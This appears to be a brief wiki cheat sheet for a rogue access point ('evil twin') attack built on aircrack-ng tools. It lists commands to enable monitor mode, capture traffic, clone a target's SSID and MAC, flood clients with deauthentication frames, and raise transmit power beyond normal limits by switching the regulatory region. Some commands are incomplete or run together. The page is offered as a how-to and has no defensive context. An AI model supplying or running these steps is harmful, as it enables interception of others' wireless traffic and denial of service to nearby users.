rogue_access_point
ROGUE ACCESS POINT Check wifi status
iwconfig
Start Wireless Interface into Monitor Mode
airmon-ng start
Start Traffic Capture
airodump-ng
Create a New AP with same SSID and MAC
airbase-ng -a -essid -c
Deauthing Access Point
aireplay-ng --deauth 0 -a <Mac Address of Acces Point
Turn Up The power on our evil access point (we need to be more powerful than the access point we'd like to clone)
iw reg set BO iwconfig txpower 30
Last updated
Was this helpful?